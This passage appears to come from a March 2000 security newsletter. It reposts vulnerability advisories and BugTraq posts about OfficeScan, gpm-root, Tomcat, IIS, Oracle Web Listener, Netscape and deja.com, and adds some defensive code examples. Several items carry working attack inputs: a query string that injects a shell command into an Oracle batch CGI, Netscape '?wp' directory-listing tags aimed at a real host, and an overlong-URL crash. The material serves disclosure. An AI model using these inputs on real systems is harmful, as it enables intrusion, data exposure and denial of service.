There, officers will learn how to track computer criminals, from pedophiles who prey on children to shysters out to bilk people of money to hackers who infiltrate confidential Web sites.

The lab at the Glen Ellyn school also will train officers in how to conduct on-line investigations, in computer modeling that will enable them to reconstruct a crime scene, and in how to present the evidence in court.

The new lab was made possible by a donation from Microsoft Corp. and Omni Tech Corp. of 51 new personal computers, screens and keyboards; a printer and overhead projector; all the necessary software; and technical support services.

The equipment and software are valued at $250,000, college officials said, and enable the college to create one of the nation's few specialized computer crime labs dedicated to training law enforcement personnel. No civilians will be able to enroll in the 40-hour, weeklong classes, which will cost $475 in tuition.

"The industry is very motivated in learning how to tackle the problems" of computer crime, Bob Herbold, executive vice president and chief operating officer of Microsoft, said at a Monday unveiling of the lab.

Until now, the law-enforcement academy has held its computer crime classes by borrowing computer space elsewhere on campus, and only when regular classes were out of session. The new computer lab allows the academy to offer classes virtually year-round, reaching literally hundreds of officers and prosecutors.
Already, the academy is receiving attention from police departments all over the country, as well as Canada, officials said.

College officials said that there is a real need for the training as police and prosecutors struggle to keep pace with the sometimes confusing world of computer crime.

"When this was brand-new technology, it was difficult for police departments to follow up," said Mike Sullivan, Naperville police detective and an instructor at the law enforcement academy.

But understanding the inner workings of computers and the Internet, officials said, is no different than learning any kind of new technology, whether it be fingerprinting or the use of DNA evidence.

One unusual aspect of the lab will be that the police officers in the class will be able to pose as children and log on to pornographic Web sites or chat rooms where Internet users prey on the young. As pedophiles reveal themselves, they can be investigated and arrested, officials said.

"It used to be that pedophiles would go to the park and pick their victims," Sullivan said. "As the Internet came along, the Internet has become the virtual park."

Such real-life training is invaluable. "There's no place else that you can go in and see a felony being committed while you are doing police training," Sullivan said.

Sullivan noted that many people wrongly think what they do on the Internet cannot be traced.

"When a crime is committed on the Internet, it makes it easier for us to track you. It's like committing a crime and then leaving your license plate at the scene," he said.

"You can't go on the Internet," he said, "without leaving a footprint."
@HWA

90.0 HNS:Mar 23rd:HUNTING CROATIAN PIRATES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 1:49 AM

Three days ago, the first coordinated police action against software pirates in Croatia resulted in the confiscation of more than 47 computers, 8536 CDs, 2602 floppy disks and nearly $1 million worth of software.

Link: Bug On-line (Croatian language)
http://www.bug.hr/vijesti/index.asp?datum=22032000#id3268

@HWA

91.0 HNS:Patch available for OfficeScan vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 24, 2000

Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). ...

Patch available for OfficeScan vulnerability

Posted to BugTraq on March 24, 2000

Security Focus BugTraq ID: 1057
Posted: March 22, 2000

Summary
=======

Trend Micro has released a patch that eliminates server security vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier versions, running on Windows NT 4 server with Internet Information Server (IIS). These versions of OfficeScan allow intruders within a firewall to invoke OfficeScan CGIs on the server without authentication - bypassing OfficeScan management console password protection. These OfficeScan CGIs are intended for administrators to manage OfficeScan antivirus running on networked workstations via the OfficeScan management console. By gaining access to execute these CGIs, hackers can use them to change OfficeScan antivirus configurations or to uninstall OfficeScan antivirus on the desktops.

Issues
======

Trend OfficeScan version 3.51 or earlier versions apply inadequate security settings on the OfficeScan server CGI components.
If a malicious user has the ability to connect to the OfficeScan server via a web browser, these CGIs can be executed to send valid commands - including the uninstall command - to OfficeScan clients. In addition, OfficeScan's implementation of user authentication in its management console - password protection - was insufficiently encrypted, and allows a malicious user to decrypt the password and gain access to the OfficeScan management console.

Implementation
==============

Trend Micro has released a patch that will secure access to the OfficeScan CGIs on the server. The patch program changes the file permissions on the OfficeScan CGIs, so only administrators can access and execute them. This patch works only on drives formatted to use the Windows NT file system (NTFS).

After applying this patch, hackers will no longer be able to remotely invoke OfficeScan CGIs without being authenticated as an administrator by NTFS security. This patch also prevents hackers who sniff for the OfficeScan management console password over the network from gaining access to the OfficeScan management console. Access to the OfficeScan management console or to execute OfficeScan CGIs now requires NTFS authentication.

Affected Software Versions
==========================

Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.50
Trend OfficeScan Corporate Edition 3.51
Trend OfficeScan for Microsoft SBS 4.5

This vulnerability is only present when the above software version is installed on a Windows NT server with IIS. It is not present when the above software version is installed on Novell NetWare servers or a Windows NT server without IIS.

Patch Availability
==================

The OfficeScan Unauthenticated CGI Usage patch can be downloaded from:
http://www.antivirus.com/download/ofce_patch.htm

More Information
================

Please see the following references for more information related to this issue.
- Trend Micro Security Bulletin:
  http://www.antivirus.com/download/ofce_patch_351.htm

- Frequently Asked Questions: Trend Micro Knowledge Base
  http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================

This is a fully supported patch. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm

Acknowledgements
================

Trend Micro thanks Gregory Duchemin http://www.securite-internet.com and Elias Levy http://www.securityfocus.com for reporting the OfficeScan server vulnerability to us, and working with us to protect our customers.

@HWA

92.0 HNS:Gpm-root problems
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 23, 2000

When the user selects one of his/her favourite utilities from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon ...

Gpm-root problems

Posted to BugTraq on March 23, 2000

I've sent a report about the following security hole to the authors of gpm, but they seemed to ignore the problem.

The problem applies to every gpm version known by me, for example 1.18.1 and 1.19.0.

To exploit this problem, gpm-root must be running on a machine and the user needs both a login to that machine and physical access to the keyboard and mouse.

gpm-root is a beautiful tool shipped in the gpm package. It pops up beautiful menus based on each user's own config file when Ctrl+Mousebutton is pressed on the console. When the user selects one of his/her favourite utilities from his/her own list, gpm-root starts this process with the group and supplementary groups of the gpm-root daemon. gpm-root calls setuid() first and setgid() afterwards, hence the latter one is unsuccessful. The authors completely forgot about calling initgroups().
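Added editor's example, not part of the post above or of the gpm package: a C program contrasting the setuid-then-setgid order the post describes with the initgroups/setgroups, setgid, setuid order, checking each step and verifying the drop afterwards. It assumes Linux and uses the constructed target ids 65534/65534 (the usual "nobody"); the run_in_child helper is my own so the demonstration can be repeated from a root parent.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* 1 if gid `g` is in the process's supplementary group list, 0 if not,
 * -1 on error (the 256-entry buffer is an assumption for this demo). */
int supplementary_groups_contain(gid_t g) {
    gid_t groups[256];
    int n = getgroups(256, groups);
    if (n < 0) return -1;
    for (int i = 0; i < n; i++)
        if (groups[i] == g) return 1;
    return 0;
}

/* The order described in the post: uid first, gid afterwards. Once the
 * effective uid is no longer 0 the process has lost CAP_SETGID, so setgid()
 * fails with EPERM and the child keeps the daemon's gid and supplementary
 * groups. Returns -1 on that failure. */
int drop_privileges_wrong_order(uid_t uid, gid_t gid) {
    if (setuid(uid) != 0) return -1;
    if (setgid(gid) != 0) return -1;   /* EPERM: we are no longer root */
    return 0;
}

/* Correct order: supplementary groups, then primary gid, then uid, every
 * step checked, then verify the drop is complete and irreversible.
 * `user` is optional: with a name, initgroups() loads that user's groups
 * from the group database; with NULL the list is reduced to just `gid`. */
int drop_privileges(const char *user, uid_t uid, gid_t gid) {
    int rc = user ? initgroups(user, gid) : setgroups(1, &gid);
    if (rc != 0) return -1;            /* needs root: the step gpm-root omitted */
    if (setgid(gid) != 0) return -1;   /* primary gid while we still may change it */
    if (setuid(uid) != 0) return -1;   /* uid last: after this there is no way back */

    /* Verification: a real drop cannot be undone and left no root group behind. */
    if (uid != 0 && setuid(0) == 0) return -1;
    if (getuid() != uid || geteuid() != uid) return -1;
    if (getgid() != gid || getegid() != gid) return -1;
    if (gid != 0 && supplementary_groups_contain(0) != 0) return -1;
    return 0;
}

/* Two-argument wrapper (no group-database lookup) with the same shape as
 * drop_privileges_wrong_order, so both can be driven by run_in_child. */
int drop_privileges_checked(uid_t uid, gid_t gid) {
    return drop_privileges(NULL, uid, gid);
}

/* Run fn(uid, gid) in a forked child so the parent keeps its own ids.
 * Returns 0 if fn succeeded, -1 if it failed, -2 on fork/wait trouble. */
int run_in_child(int (*fn)(uid_t, gid_t), uid_t uid, gid_t gid) {
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) _exit(fn(uid, gid) == 0 ? 0 : 1);
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -2;
    return WEXITSTATUS(status) == 0 ? 0 : -1;
}

int main(void) {
    uid_t uid = 65534; gid_t gid = 65534;   /* constructed: "nobody" on most Linux systems */
    if (getuid() != 0) {
        /* Unprivileged: every variant must fail, since none of the calls is permitted. */
        printf("not root; drop_privileges() -> %d (expected -1)\n", drop_privileges(NULL, uid, gid));
        return 0;
    }
    printf("setuid then setgid (gpm-root order): %s\n",
           run_in_child(drop_privileges_wrong_order, uid, gid) == 0 ? "ok" : "setgid failed, gid 0 kept");
    printf("groups, gid, uid order: %s\n",
           run_in_child(drop_privileges_checked, uid, gid) == 0 ? "dropped and verified" : "failed");
    return 0;
}
```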
Egmont Koblinger

@HWA

93.0 HNS:Esafe Protect Gateway (CVP) problems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 22, 2000

The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP ...

Esafe Protect Gateway (CVP) problems

Posted to BugTraq on March 22, 2000

After notification of the manufacturer here is the full report on a problem noted with Esafe Protect Gateway.

SUMMARY
-------

The Esafe Protect Gateway (ESPG) does not scan some files in combination with FireWall-1 and CVP.

DETAILS
-------

If you want the Esafe Protect Gateway to scan all content for the presence of a virus you have two options.

1. Choose to scan anything not listed in the 'safe file types' list. And then clear out all entries in that list.

2. Choose to scan only files listed in the 'dangerous file types' list. And then have only one extension listed, namely '*'.

Deciding to rely on extensions seems an indication of a flawed design already. Renaming files is a common practice and can be done by anyone capable of operating a keyboard.

The problem is that anything with the MIME type set to TEXT/HTML will not be scanned regardless of the options recommended above.

A simple test was capable of pointing this out. Set up a default Apache server. Copy a virus file to two locations, being http://website/test1.txt and http://website/test1.html, and try to download them with your favorite browser. The URL is unique and was never used by your browser to minimize the possibilities of caches being in place. But forced reloads work properly and are sufficient if you want to replicate this issue.

Downloading http://website/test1.html does nothing to detect the virus and it is yours. No protection is offered. Downloading http://website/test1.txt will not work as ESPG will now intercept the file containing the virus.
By adjusting the webserver to send out *.txt as MIME type TEXT/HTML and *.html as MIME type TEXT/PLAIN you can now test with http://website/test2.txt and http://website/test2.html to verify things. Downloading http://website/test2.txt will get you infected as ESPG will not scan the file. And downloading http://website/test2.html will not work as ESPG detects the virus and will prevent it from downloading.

CONCLUSION
----------

Esafe Protect Gateway can at present not be trusted to protect you from downloading a virus.

VERSIONS
--------

Esafe Protect Gateway v2.1 build 98. Virus tables dated March 15, 2000.

STATUS
------

Manufacturer notified. No fix available. Results have not been confirmed yet. However I was able to verify that the problem lies with Esafe and not with Check Point by using Trend Micro's CVP server instead, which did not suffer from the same problem.

Hugo.

@HWA

94.0 HNS:Bug in Apache project: Jakarta Tomcat
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 22, 2000

The Apache project: Jakarta Tomcat contains a serious security bug. Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. ...

Bug in Apache project: Jakarta Tomcat

Posted to BugTraq on March 22, 2000

The Apache project: Jakarta Tomcat contains a serious security bug. Tomcat is used together with the Apache web server to serve Java Server Pages and Java servlets. Summary from the Tomcat development team advisory is posted below:

Advisory: Delivered with Tomcat is an example (jsp/source.jsp) that can be used to deliver the contents of any file on your machine.

Recommended action: The simplest course of action is to simply remove this example from your machine. Alternatively, you can replace the associated ShowSource.class file with one from the current 3.1 beta.
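Added editor's example of the containment this advisory goes on to describe (resolving file references only inside the context, plus a ".." rejection); it is my own C code, not Tomcat's, and builds its own constructed context directory under /tmp. It also shows why the ".." check alone is not enough: a symlink inside the context that points outside contains no ".." yet resolves past the root.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The string check the advisory mentions for ShowSource: 1 if the request
 * contains "..", else 0. Necessary as a first filter, not sufficient alone. */
int contains_dotdot(const char *requested) {
    return strstr(requested, "..") != NULL;
}

/* Resolve `requested` (as received from the client) against `context_root`.
 * Returns 1 and fills `out` only if the canonical path (symlinks and ".."
 * resolved by realpath) still lies inside the canonical context root;
 * 0 for anything outside, missing or unresolvable; -1 if the root is bad. */
int resolve_in_context(const char *context_root, const char *requested,
                       char *out, size_t outlen) {
    char root[PATH_MAX], joined[PATH_MAX], full[PATH_MAX];
    if (!realpath(context_root, root)) return -1;
    while (*requested == '/') requested++;          /* everything is context-relative */
    if (snprintf(joined, sizeof joined, "%s/%s", root, requested) >= (int)sizeof joined)
        return 0;
    if (!realpath(joined, full)) return 0;          /* nonexistent or unresolvable */
    size_t rl = strlen(root);
    /* The prefix must end at a path boundary so "/ctx" does not accept "/ctx2/x". */
    if (strncmp(full, root, rl) != 0 || (full[rl] != '/' && full[rl] != '\0'))
        return 0;
    if (strlen(full) + 1 > outlen) return 0;
    strcpy(out, full);
    return 1;
}

/* Constructed test layout under a fresh temp dir (assumption: /tmp is writable):
 *   <tmp>/outside.txt                (must never be served)
 *   <tmp>/ctx/index.jsp              (inside the context)
 *   <tmp>/ctx/link -> ../outside.txt (symlink that escapes without any "..")
 * Returns 0 on success and writes the context root path into `ctx`. */
int build_fixture(char *ctx, size_t ctxlen) {
    char tmpl[] = "/tmp/tomcatctxXXXXXX";
    char p[PATH_MAX];
    FILE *f;
    if (!mkdtemp(tmpl)) return -1;
    snprintf(p, sizeof p, "%s/outside.txt", tmpl);
    if (!(f = fopen(p, "w"))) return -1;
    fputs("secret\n", f); fclose(f);
    snprintf(ctx, ctxlen, "%s/ctx", tmpl);
    if (mkdir(ctx, 0700) != 0) return -1;
    snprintf(p, sizeof p, "%s/index.jsp", ctx);
    if (!(f = fopen(p, "w"))) return -1;
    fputs("<%= 1 + 1 %>\n", f); fclose(f);
    snprintf(p, sizeof p, "%s/link", ctx);
    if (symlink("../outside.txt", p) != 0) return -1;
    return 0;
}

int main(void) {
    char ctx[PATH_MAX], out[PATH_MAX];
    const char *requests[] = { "index.jsp", "/index.jsp", "../outside.txt", "link" };
    if (build_fixture(ctx, sizeof ctx) != 0) { perror("fixture"); return 1; }
    for (size_t i = 0; i < sizeof requests / sizeof *requests; i++) {
        int ok = resolve_in_context(ctx, requests[i], out, sizeof out);
        printf("%-16s dotdot=%d served=%d %s\n", requests[i],
               contains_dotdot(requests[i]), ok, ok == 1 ? out : "");
    }
    return 0;
}
```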
Fixes:

Fixes have been made to the core of Tomcat to not allow any file references to be resolved outside of the context being used for the resolution. Additionally, a change has been made to ShowSource.java to disallow any requests which contain the string "..". The 3.1 beta 1 release has been refreshed with these fixes applied.

Med venlig hilsen/Best regards/Freundliche Grüße

Jan Madsen
S e c u r i t y w o r k e r s

@HWA

95.0 HNS:MS SECURITY BULLETIN #18
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 21, 2000

Microsoft has released a patch that eliminates a security vulnerability in Microsoft Internet Information Server 4.0. The vulnerability could allow a malicious user to consume all resources on a web server and prevent it from servicing other users. ...

MS SECURITY BULLETIN #18
Posted to BugTraq on March 21, 2000

Microsoft Security Bulletin (MS00-018)
--------------------------------------

Patch Available for "Chunked Encoding Post" Vulnerability

Originally Posted: March 20, 2000

Summary
=======

Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Internet Information Server 4.0. The vulnerability could allow a malicious user to consume all resources on a web server and prevent it from servicing other users.

Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/technet/security/bulletin/fq00-018.asp.

Issue
=====

IIS 4.0 supports chunked encoding transfers, but does not limit the size of the buffer that can be reserved. This would allow a malicious user to request an extremely large buffer for a POST or PUT operation, but never actually send data, thereby blocking memory on the server that had been allocated to the session. If sufficient memory on the server were blocked in this fashion, it could prevent the server from performing useful work.
There is no capability through this attack to create, modify or delete data on the server, nor is there any capability to usurp administrative control of the server. If the malicious user closed his session, the memory would be released and the server's operation would return to normal. Otherwise, the machine could be put back into normal service by stopping and restarting the service.

Affected Software Versions
==========================

- Microsoft Internet Information Server 4.0

Patch Availability
==================

- X86: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19761
- Alpha: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=19762

NOTE: Additional security patches are available at the Microsoft Download Center

@HWA

96.0 HNS:S.A.F.E.R. Security Bulletin 000317
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 20, 2000

Problem exists in Netscape Enterprise Server that can allow remote user to obtain list of directories and subdirectories on the server ...

S.A.F.E.R. Security Bulletin 000317
Posted to BugTraq on March 20, 2000

S.A.F.E.R. Security Bulletin 000317.EXP.1.5
______________________________________________

TITLE : Netscape Enterprise Server and '?wp' tags
DATE : March 17, 2000
NATURE : Remote user can obtain list of directories on Netscape Enterprise Server
AFFECTED : Netscape Enterprise Server 3.x

PROBLEM:

Problem exists in Netscape Enterprise Server that can allow remote user to obtain list of directories and subdirectories on the server.

DETAILS:

Netscape Enterprise Server with 'Web Publishing' enabled can be tricked into displaying the list of directories and subdirectories, if user supplies certain 'tags'. For example:

http://home.netscape.com/?wp-cs-dump

will reveal the contents of the root directory on that web server. Contents of subdirectories can be obtained as well.
Other tags that can be used are:

?wp-ver-info
?wp-html-rend
?wp-usr-prop
?wp-ver-diff
?wp-verify-link
?wp-start-ver
?wp-stop-ver
?wp-uncheckout

FIXES:

Disable 'Web Publishing'.

It is safe to assume that 'Web Publishing' is not the only feature that will 'activate' this problem. We have found few servers running Netscape Enterprise Server that did not have 'Web Publishing' enabled, but were still vulnerable to this problem. Until Netscape makes an official response and clarifies what is the cause of this problem, it is advised that you test your server against this vulnerability, and if you are vulnerable, try to disable certain features and services.

Netscape has been contacted on many occasions, but has failed to respond.

S.A.F.E.R. - Security Alert For Enterprise Resources
Copyright (c) 2000 The Relay Group

@HWA

97.0 HNS:Decon fix for con/con is vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 18, 2000

If you had con problem and installed Decon fix, you are now vulnerable to another win 95(possibly)/98(tested) crash which is worse than the previous. ...

Decon fix for con/con is vulnerable
Posted to BugTraq on March 18, 2000

If you had con problem and installed Decon fix, you are now vulnerable to another win 95(possibly)/98(tested) crash which is worse than the previous.

Software affected : All versions of Microsoft Internet Explorer (It doesn't work in Netscape Navigator)

Actual problem : Type existing server in address box, and then request for nonexistent file with name >300 symbols. After server sends reply to the browser your system stops responding at all, Control+Alt+Del work but you won't see the box with tasks running so only thing you can do is REBOOT. Somebody can deface some good website and create a redirect with 0 seconds waiting to such link.

Example : http://www.amsouth.com/(lot of aaaa's).html

Fix : Delete Decon fix from startup folder :) Now you are vulnerable to con/con.
Hello to Cre@tor

Speedo
mailto:Tima@au.ru

@HWA

98.0 HNS:Cerberus Information Security Advisory
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow a remote attacker to run arbitrary commands on the web server ...

Cerberus Information Security Advisory
Posted to BugTraq on March 17, 2000

Released : 15th March 2000
Name : Oracle
Affected Systems : Oracle Web Listener 4.0.x on Windows NT
Issue : Attackers can run arbitrary commands on the webserver

Description
***********

The Cerberus Security Team has discovered a number of issues with Oracle's Web Listener, part of the Oracle Application Server, that can allow a remote attacker to run arbitrary commands on the web server

Details
*******

Part of the problem is caused by default settings after OAS has been installed. The "ows-bin" virtual directory on an Oracle Web Listener is the equivalent of the "cgi-bin" on other web servers and by default this is set to C:\orant\ows\4.0\bin - this directory not only contains a number of batch files, DLLs and executables but also the binary image file for the Listener itself. Even if this default setting has been changed however you may still be at risk if you have batch files in the new "ows-bin" directory.

Arbitrary Command Execution
***************************

The Oracle Web Listener will execute batch files as CGI scripts and by making a request to a batch file that requires one or more arguments it is possible to execute any command the attacker wants by building a special query string. For example the following will give a directory listing:

http://charon/ows-bin/perlidlc.bat?&dir

It is even possible to use UNC paths so the Listener will connect to the remote machine over NBSession, download the executable and then execute it.
By default the Web Listener process runs in security context of SYSTEM so any commands issued by an attacker will run with SYSTEM privileges.

Another problem is that the Listener will expand the "*" character so even if the attacker doesn't know the name of a real batch file in the "ows-bin" they can request *.bat?&command

Executables
***********

Some of the executables in the default directory allow attackers to kill services, return configuration information and cause other undesirable events to occur.

Solution:
*********

Due to the severity of this problem Cerberus recommends that the following be actioned immediately. If "ows-bin" is the default then using the Oracle Application Server Manager remove the ows-bin virtual directory or point it to a more benign directory. If "ows-bin" is not the default then verify that there are no batch files in this directory.

A check for this has been added to Cerberus' security scanner, CIS available from their website.

About Cerberus Information Security, Ltd
****************************************

Cerberus Information Security, Ltd, a UK company, are specialists in penetration testing and other security auditing services. They are the developers of CIS (Cerberus' Internet security scanner) available for free from their website: http://www.cerberus-infosec.co.uk

To ensure that the Cerberus Security Team remains one of the strongest security audit teams available globally they continually research operating system and popular service software vulnerabilities leading to the discovery of "world first" issues. This not only keeps the team sharp but also helps the industry and vendors as a whole ultimately protecting the end consumer. As testimony to their ability and expertise one just has to look at exactly how many major vulnerabilities have been discovered by the Cerberus Security Team - over 40 to date, making them a clear leader of companies offering such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus Information Security, Ltd are located in London, UK but serves customers across the World. For more information about Cerberus Information Security, Ltd please visit their website or call on +44(0) 181 661 7405

Permission is hereby granted to copy or redistribute this advisory but only in its entirety.

Copyright (C) 2000 by Cerberus Information Security, Ltd

@HWA

99.0 HNS:Malicious-HTML vulnerabilities at deja.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

Deja.com does not always escape meta-characters when displaying Usenet articles. This allows an attacker to include arbitrary tags in the HTML sent to people reading the attacker's article at deja.com. ...

Malicious-HTML vulnerabilities at deja.com
Posted to BugTraq on March 17, 2000

Niall Smart, niall@pobox.com

Synopsis
========

deja.com does not always escape meta-characters when displaying Usenet articles. Specifically, the article view page (http://www.deja.com/getdoc.xp) and the thread view page (http://www.deja.com/viewthread.xp) display the subject of the article "as is" between title tags. This allows an attacker to include arbitrary tags in the HTML sent to people reading the attacker's article at deja.com.

There are probably a large number of sites out there with this type of vulnerability, the deja.com example is interesting because it's a busy site with a large amount of relatively users who naively trust it.

Exploit
=======

An attacker can embed any tag in the head or body of the HTML page. This allows numerous attacks including:

Cross Site Scripting: An attacker can post an article with a link to a script on another server and call that script from the onLoad event handler.

Site Spoofing: An attacker can use a meta tag to automatically redirect the user to a spoofed version of deja.com.

See the CERT advisory referenced below for more information on this type of attack.
Examples
========

NOTE: The following examples are intended to be harmless, however I take no responsibility for any damage caused by following these links.

JavaScript popup: http://www.deja.com/getdoc.xp?AN=591804116

Redirection using meta tag: http://www.deja.com/getdoc.xp?AN=591833344

Notes
=====

I haven't thoroughly tested deja.com's pages, there may be other instances of this error. It would be particularly interesting to find one that didn't require the attacker to include the HTML in the subject field of the article.

This example illustrates how *not* to approach meta-character escaping. If you call a function to escape meta-characters each time the data is inserted into the web page, as deja.com appear to do, you run the risk of occasionally forgetting to do it. deja.com escape correctly in two other places on the article view page but forget once. Instead you should escape them earlier in the data flow, perhaps just after getting the data from the database, thereby precluding the human-error factor.

References
==========

CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests
http://www.cert.org/advisories/CA-2000-02.html

HTML 3.2 Character Entities
http://www.w3.org/TR/REC-html32.html#latin1

@HWA

100.0 HNS:Certificate Validation Error in Netscape Browsers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 17, 2000

The problem is that there is an inherited trust between an expired certificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate. ...

Certificate Validation Error in Netscape Browsers
Posted to BugTraq on March 17, 2000

This may not be a normal "BugTraq" issue, since it is more a flaw in trust in a security design than it is an actual bug in software... but none-the-less I think it is something that should be discussed.
I haven't checked this with Microsoft IE, I just noticed it as being a flaw in Netscape (submitted a bug report to them earlier but they are either really busy or have chosen to ignore the report.) Tested in browsers from 4.07 - 4.72, all of which operated in the same fashion.

What is the issue?

The scenario is that a user accesses a website for which they do not currently have trust for the signer of the certificate. They are asked whether they would like to trust the server certificate (until it expires,) which if they respond yes, the web site signer certificate will be stored in the certificate database. You can check on these certificates by clicking on the Security Icon on the browser, then select the Website item from the menu. Once stored in the database, any future access to this site is permitted without warning.

The error occurs when the web site certificate is expired and the new site certificate is valid. Netscape never checks to see if the certificate is expired and replaced with a new certificate, and thus the user can continue to access the site without a warning stating that the certificate is expired and that a new certificate exists for the site (it apparently only checks to see if the new certificate isn't expired.) Manually verifying the old certificate in the database will prove that the certificate is invalid.

When the site is properly reissued a certificate, Netscape automatically trusts the new certificate based on the previous certificate... if the previous certificate is removed from the database and the website is re-accessed, the standard warning appears asking the user if they wish to trust the certificate. Since the new certificate is cryptographically different from the old certificate, no trust relationship should exist (only the signer is the same.)

Netscape does not replace the old expired certificate with the new certificate, and does not add the new certificate to the database.
Nor does it tell the user that the new certificate a site is sending does not match a previous certificate.

Why is this a problem?

The problem is that there is an inherited trust between an expired certificate and an active certificate, where there really shouldn't be. If any trust should be there, it certainly shouldn't be with an expired certificate.

The idea here is that Netscape should complain about a site which has a certificate different than what Netscape has in its database. When you accept a certificate from a website which you do not already hold a trust with the signer of the certificate, you should be warned if that certificate is no longer valid or when the server has been issued a new one. You are trusting that certificate and its signer, not that site. If the site's certificate changes, you should be warned about the change and asked if you still want to trust the site. If a hacker manages to gain access to the key and the certificate, and changes the key and the certificate, a warning may be the only thing to protect you from that hacker becoming a man in the middle to the attack.

What should be the solution?

An option, in the browser, to allow the user to be warned the first time a certificate changes on a webserver. If the previous certificate is expired, and the current certificate on a site is different, the user should be warned of the change, and asked whether they wish the new certificate to replace the previous one. That way, paranoid users like myself can be warned when a certificate changes, so that we can decide whether the new certificate should be trusted. Of course, if I already trust the certificate signer, then I shouldn't be prompted about the certificate.
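The two trust policies the poster contrasts, as an added example that is not part of the advisory or of Netscape's code: a small trust-on-first-use certificate store modelled in Python, with the inherited-trust behaviour described above beside the warn-on-change policy proposed as the solution, replayed on the advisory's own scenario (accepted cert expires, site is reissued a different cert by the same signer). Site names, signer names and fingerprints are constructed placeholders.

```python
from dataclasses import dataclass
from datetime import date
from typing import Callable, Dict, Set


@dataclass(frozen=True)
class Cert:
    fingerprint: str   # digest of the certificate; changes whenever key or cert changes
    issuer: str        # the signer of the certificate
    not_after: date    # expiry date

    def expired(self, today: date) -> bool:
        return today > self.not_after


@dataclass(frozen=True)
class Decision:
    action: str   # "accept" (no dialog) or "prompt" (ask the user)
    reason: str


Policy = Callable[[str, Cert, Dict[str, Cert], Set[str], date], Decision]


def netscape4_decision(site: str, presented: Cert, store: Dict[str, Cert],
                       trusted_signers: Set[str], today: date) -> Decision:
    """Behaviour the advisory describes: an accepted site cert is kept until it
    expires, and a later cert from the same signer is trusted as long as the
    new cert itself is not expired. The stored cert is never re-checked."""
    if presented.expired(today):
        return Decision("prompt", "presented certificate is expired")
    if presented.issuer in trusted_signers:
        return Decision("accept", "signer is trusted")
    previous = store.get(site)
    if previous is None:
        return Decision("prompt", "first visit, signer not trusted")
    if previous.issuer == presented.issuer:
        # Inherited trust: a cryptographically different cert is accepted
        # silently because the (possibly expired) stored cert had the same signer.
        return Decision("accept", "same signer as previously accepted certificate")
    return Decision("prompt", "different signer")


def proposed_decision(site: str, presented: Cert, store: Dict[str, Cert],
                      trusted_signers: Set[str], today: date) -> Decision:
    """Policy the poster asks for: trust is bound to the exact certificate the
    user accepted, so any change is surfaced unless the signer itself is trusted."""
    if presented.expired(today):
        return Decision("prompt", "presented certificate is expired")
    if presented.issuer in trusted_signers:
        return Decision("accept", "signer is trusted")
    previous = store.get(site)
    if previous is None:
        return Decision("prompt", "first visit, signer not trusted")
    if previous.fingerprint == presented.fingerprint:
        return Decision("accept", "matches stored certificate")
    detail = " (stored certificate has expired)" if previous.expired(today) else ""
    return Decision("prompt", "certificate changed since it was accepted" + detail)


def run_advisory_scenario(policy: Policy) -> Decision:
    """Replay the sequence from the advisory: the user accepts a site cert from
    an untrusted signer, that cert expires, and the site is reissued a new cert
    by the same signer. Returns the decision taken on the second visit."""
    site = "secure.example"                         # constructed placeholder
    store: Dict[str, Cert] = {}
    trusted_signers = {"Constructed Root CA"}       # constructed placeholder
    old = Cert("sha1:0000aaaa (constructed)", "Constructed Site Signer", date(2000, 3, 1))
    new = Cert("sha1:1111bbbb (constructed)", "Constructed Site Signer", date(2001, 3, 1))

    first = policy(site, old, store, trusted_signers, date(2000, 1, 15))
    assert first.action == "prompt"
    store[site] = old                               # user clicks "yes": old cert stored

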